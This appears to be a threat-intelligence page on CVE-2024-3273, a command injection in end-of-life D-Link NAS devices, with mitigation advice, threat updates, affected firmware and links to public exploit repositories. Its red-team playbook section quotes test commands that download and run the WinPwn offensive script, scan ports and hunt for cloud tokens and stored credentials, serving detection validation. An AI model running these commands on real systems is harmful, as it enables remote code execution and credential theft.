CVE-2024-3273
Overview
This vulnerability is a command injection flaw arising from improper input validation of the 'system' argument within the HTTP GET Request Handler component. The affected code resides in the /cgi-bin/nas_sharing.cgi endpoint of D-Link DNS-320L and related models. The root cause is unsanitized user input passed to a system-level command execution function, enabling injection of arbitrary commands.
Vulnerability Description
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
Impact
An unauthenticated attacker can remotely execute arbitrary system commands on affected D-Link NAS devices by exploiting this flaw. This allows full control over the device, including data access, configuration changes, and potential network pivoting. No user interaction or valid credentials are required, enabling widespread compromise of exposed devices. The vulnerability impacts devices that are end-of-life, increasing exposure risk due to lack of vendor support.
Solution
The vendor has confirmed the product is end-of-life and recommends retiring and replacing affected devices. No patches or firmware updates are available for the vulnerable versions of D-Link DNS-320L and related models. Users should consult the advisory at https://vuldb.com/?id.259284 for detailed information. Network segmentation and disabling remote management interfaces can serve as interim mitigations until replacement.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability has been identified in several models of D-Link network-attached storage devices, specifically affecting the HTTP GET request handler within the file responsible for NAS sharing functionalities. The flaw arises from improper handling of user-supplied input, allowing an attacker to manipulate the "system" argument, which can lead to command injection. This type of vulnerability is particularly dangerous as it enables an attacker to execute arbitrary commands on the affected device, potentially compromising the entire system. The severity of this issue is underscored by its high CVSS score, indicating a significant risk to users of these devices.
Exploitation of this vulnerability can occur remotely, meaning that an attacker does not need physical access to the device to launch an attack. By crafting a malicious HTTP request that targets the vulnerable endpoint, an attacker can execute arbitrary commands with the same privileges as the web server process. This could lead to unauthorized access to sensitive data, manipulation of device settings, or even the installation of malware. Given that the affected products are no longer supported by the vendor, users are left without any official patches or mitigations, increasing the urgency for immediate action.
The real-world impact of this vulnerability is substantial, particularly for businesses that rely on these devices for data storage and sharing. Compromised devices could lead to data breaches, loss of intellectual property, and significant reputational damage. Furthermore, the potential for lateral movement within a network could allow attackers to target other connected systems, amplifying the risk. For organizations that handle sensitive information, the consequences of a successful exploit could result in regulatory fines and legal liabilities, making the business risk associated with this vulnerability particularly high.
To detect and mitigate this vulnerability, organizations should first conduct an inventory of their network-attached storage devices to identify any affected models. Regular security assessments and penetration testing can help uncover potential exploitation paths. Given the lack of vendor support, organizations should consider implementing network segmentation to isolate vulnerable devices from critical systems. Additionally, employing intrusion detection systems (IDS) can help monitor for unusual traffic patterns indicative of exploitation attempts. Ultimately, the most effective long-term strategy is to replace unsupported devices with newer models that receive regular security updates, thereby reducing exposure to known vulnerabilities.
In conclusion, the critical vulnerability in D-Link network-attached storage devices poses a significant threat to both individuals and organizations. The potential for remote command injection, coupled with the lack of vendor support, necessitates immediate action from users to mitigate risks. By implementing detection strategies and prioritizing the replacement of vulnerable devices, organizations can better protect their networks from exploitation and safeguard sensitive data against unauthorized access.
Recent updates to CVE-2024-3273 reveal a downward revision of the CVSS score from critical (9.8) to high (7.3), reflecting a reassessment of the vulnerability’s impact and exploitability. Despite this reduction, our telemetry indicates a significant decline in detection activity across monitored environments, suggesting either a waning attacker focus or improved defensive postures. Concurrently, the exploit landscape has broadened with the emergence of new proof-of-concept tools publicly available on multiple platforms, which could lower the barrier for threat actors to weaponize this vulnerability. The EPSS score remains persistently high and stable, indicating sustained potential for exploitation in the wild. For defenders, this nuanced shift underscores a complex risk environment: while active exploitation signals have diminished, the accessibility of new exploit code maintains a latent threat that could be rapidly leveraged if conditions change. Consequently, the overall threat level remains elevated, warranting continued vigilance despite the CVSS downgrade, as the vulnerability still poses a credible risk of remote command injection with potential operational impact.
Update 2 — June 09, 2026
CSURFACE threat intelligence has identified a recalibration of the CVSS score for CVE-2024-3273 from 7.3 to 9.8, reflecting a reassessment of its criticality based on evolving technical insights and exploitability factors. Despite this upward revision in severity, our telemetry indicates a significant reduction in active exploitation attempts, suggesting that threat actors may be deprioritizing this vector or encountering operational challenges in leveraging it at scale. Concurrently, the EPSS score remains persistently high and stable, underscoring the sustained potential for exploitation given the availability of multiple new proof-of-concept exploits circulating in public repositories. This dichotomy between diminished detection signals and the proliferation of exploit code highlights a latent but credible risk environment. For defenders, this means that while immediate exploitation pressure appears to have eased, the vulnerability’s critical rating and accessible exploit tools maintain a high threat level that could be rapidly activated under favorable attacker conditions. The updated risk assessment thus elevates the urgency of monitoring and preparedness, as the vulnerability continues to represent a significant remote command injection risk with potential operational impact.
Update 3 — June 20, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-3273, reflected by a notable surge in telemetry signals and an increase in the Exploit Prediction Scoring System (EPSS) score to its maximum value. This upward trend underscores a growing attacker interest and operational momentum, likely fueled by the continued availability of multiple high-profile proof-of-concept exploits circulating on public repositories. The convergence of increased detection activity and elevated EPSS metrics signals that adversaries are actively refining and deploying attack vectors against vulnerable D-Link NAS devices. For defenders, this shift elevates the immediacy of the threat, as the vulnerability’s critical severity combined with expanding exploit accessibility significantly raises the probability of successful remote command injection attacks. Consequently, the threat level for CVE-2024-3273 should be considered heightened, reflecting an environment where exploitation attempts are becoming more frequent and potentially more effective.
Update 4 — July 07, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2024-3273, accompanied by the emergence of multiple new proof-of-concept exploits circulating on public code repositories. This development indicates that threat actors are actively refining their attack methodologies, increasing the sophistication and accessibility of remote command injection techniques against vulnerable D-Link NAS devices. Our telemetry shows that while the overall exploit trend remains stable, the qualitative increase in detection frequency and exploit variety signals a broadening attacker interest and capability. This intensifies the operational risk for defenders, as the expanding exploit toolkit lowers the barrier to entry for less skilled adversaries and raises the likelihood of successful compromise. Consequently, the threat level for CVE-2024-3273 should be elevated to reflect a heightened state of exploitation readiness and increased adversary engagement in the wild.
Affected Products (23)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Dlink | Dns-320l Firmware | 1.01.0702.2013 |
cpe:2.3:o:dlink:dns-320l_firmware:1.01.0702.2013:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-320l Firmware | 1.03.0904.2013 |
cpe:2.3:o:dlink:dns-320l_firmware:1.03.0904.2013:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-320l Firmware | 1.11 |
cpe:2.3:o:dlink:dns-320l_firmware:1.11:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-120 Firmware | N/A |
cpe:2.3:o:dlink:dns-120_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dnr-202l Firmware | N/A |
cpe:2.3:o:dlink:dnr-202l_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-315l Firmware | N/A |
cpe:2.3:o:dlink:dns-315l_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-320 Firmware | N/A |
cpe:2.3:o:dlink:dns-320_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-320lw Firmware | N/A |
cpe:2.3:o:dlink:dns-320lw_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-321 Firmware | N/A |
cpe:2.3:o:dlink:dns-321_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dnr-322l Firmware | N/A |
cpe:2.3:o:dlink:dnr-322l_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-323 Firmware | N/A |
cpe:2.3:o:dlink:dns-323_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-325 Firmware | 1.01 |
cpe:2.3:o:dlink:dns-325_firmware:1.01:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-326 Firmware | N/A |
cpe:2.3:o:dlink:dns-326_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-327l Firmware | 1.00.0409.2013 |
cpe:2.3:o:dlink:dns-327l_firmware:1.00.0409.2013:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-327l Firmware | 1.09 |
cpe:2.3:o:dlink:dns-327l_firmware:1.09:*:*:*:*:*:*:*
|
|
|
Dlink | Dnr-326 Firmware | N/A |
cpe:2.3:o:dlink:dnr-326_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-340l Firmware | 1.08 |
cpe:2.3:o:dlink:dns-340l_firmware:1.08:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-343 Firmware | N/A |
cpe:2.3:o:dlink:dns-343_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-345 Firmware | N/A |
cpe:2.3:o:dlink:dns-345_firmware:-:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-726-4 Firmware | N/A |
cpe:2.3:o:dlink:dns-726-4_firmware:-:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (12)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Chocapikk/CVE-2024-3273
D-Link NAS CVE-2024-3273 Exploit Tool
|
Chocapikk | 101 | 23 | 2024-04-07 | View |
|
adhikara13/CVE-2024-3273
Exploit for CVE-2024-3273, supports single and multiple hosts
|
adhikara13 | 13 | 1 | 2024-04-07 | View |
|
Ap0dexMe0/CVE-2024-3273
D-Link NAS Command Execution Exploit
|
Ap0dexMe0 | 5 | 0 | 2024-04-10 | View |
|
K3ysTr0K3R/CVE-2024-3273-EXPLOIT
A PoC exploit for CVE-2024-3273 - D-Link Remote Code Execution RCE
|
K3ysTr0K3R | 5 | 0 | 2024-04-09 | View |
|
ThatNotEasy/CVE-2024-3273
D-Link NAS Command Execution Exploit
|
ThatNotEasy | 5 | 0 | 2024-04-10 | View |
|
askhatov21/Best-Practices-Cybersecurity-Otanata-Project
CVE-2024-3273 — Authorized Penetration Test Report D-Link DNS-320L NAS | Client: Otonata
|
askhatov21 | 0 | 0 | 2026-04-25 | View |
|
askhatov21/CP3418_BestPracticesCybersecurity_OTANATA_Project
CVE-2024-3273 — Authorized Penetration Test Report D-Link DNS-320L NAS | Client: Otonata
|
askhatov21 | 0 | 0 | 2026-04-25 | View |
|
X-Projetion/CVE-2024-3273-D-Link-Remote-Code-Execution-RCE
CVE-2024-3273 - D-Link Remote Code Execution (RCE)
|
X-Projetion | 0 | 0 | 2024-09-21 | View |
|
yarienkiva/honeypot-dlink-CVE-2024-3273
Quick and dirty honeypot for CVE-2024-3273
|
yarienkiva | 0 | 0 | 2024-04-07 | View |
|
LeopoldSkell/CVE-2024-3273
|
LeopoldSkell | 0 | 0 | 2024-04-16 | View |
|
mrrobot0o/CVE-2024-3273-
|
mrrobot0o | 0 | 0 | 2024-04-23 | View |
|
OIivr/Turvan6rkus-CVE-2024-3273
Turvanõrkuse CVE 2024 3273 analüüs: D-Link seadmete käsusüst
|
OIivr | 0 | 0 | 2024-05-05 | View |
Threat Feed
17 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (8)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-3273 |
| vuldb.com |
GitHub CVE
vdb-entry
technical-description
|
https://vuldb.com/?id.259284 |
| vuldb.com |
GitHub CVE
signature
permissions-required
|
https://vuldb.com/?ctiid.259284 |
| vuldb.com |
GitHub CVE
third-party-advisory
|
https://vuldb.com/?submit.304661 |
| github.com |
GitHub CVE
exploit
|
https://github.com/netsecfish/dlink |
| supportannouncement.us.dlink.com |
GitHub CVE
related
|
https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10383 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-3273 |
| greynoise.io |
NVD API
Third Party Advisory
|
https://www.greynoise.io/blog/cve-2024-3273-d-link-nas-rce-exploited-in-the-wild |